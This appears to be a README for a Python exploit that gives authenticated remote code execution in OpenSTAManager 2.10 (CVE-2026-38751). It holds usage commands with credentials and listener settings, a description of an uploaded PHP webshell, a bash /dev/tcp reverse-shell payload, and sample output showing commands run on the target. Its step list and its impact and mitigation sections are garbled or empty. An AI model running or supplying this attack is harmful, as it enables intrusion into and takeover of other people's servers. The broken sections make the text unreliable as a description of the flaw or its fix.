
OpenSTAManager RCE Exploit (CVE-2026-38751)
This Python script exploits a Remote Code Execution vulnerability in OpenSTAManager version 2.10, identified as CVE-2026-38751. The exploit allows authenticated users to upload a malicious module and execute arbitrary commands on the target system.
The exploit follows these steps:
MODULE)shell.php) that executes commands via GET parameter crequests, zipfilepython3 exploit.py -u http://target.com -U admin -P password
python3 exploit.py -u http://target.com -U admin -P password --interactive
python3 exploit.py -u http://target.com -U admin -P password --lhost 10.10.14.180 --lport 4444
| Argument | Description |
|---|---|
-u, --url | Target URL (required) |
-U, --user | Username for authentication (required) |
-P, --password | Password for authentication (required) |
--interactive | Enter interactive shell mode |
--no-cleanup | Don't remove shell files after execution |
--lhost | Local host for reverse shell |
--lport | Local port for reverse shell |
shell/MODULE: Module configuration fileshell/shell.php: PHP webshell that executes commands passed via GET parameter cid to confirm it's workingThe exploit attempts multiple reverse shell payloads:
bash -i >& /dev/tcp/{lhost}/{lport} 0>&1⚠️ Disclaimer: This exploit is intended for educational and authorized security testing purposes only.
This vulnerability allows:
To protect against this vulnerability:
[ OpenSTAManager RCE Exploit : ]
Target: http://target.com
[*] Step 1: Login...
[+] Login successful: admin
[*] Step 2: Enable updates...
[+] Updates enabled
[*] Step 3: Create ZIP...
[*] Created in-memory ZIP file
[*] Shell location: /modules/shell/shell.php
[*] Step 4: Upload...
[*] Upload status: 200
[+] Upload successful
[*] Step 5: Verify...
[+] Vulnerability confirmed!
[+] Shell: http://target.com/modules/shell/shell.php
[+] Test: http://target.com/modules/shell/shell.php?c=whoami
[*] Entering interactive mode...
cmd> whoami
www-data
cmd> exit
This exploit is provided for educational purposes only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.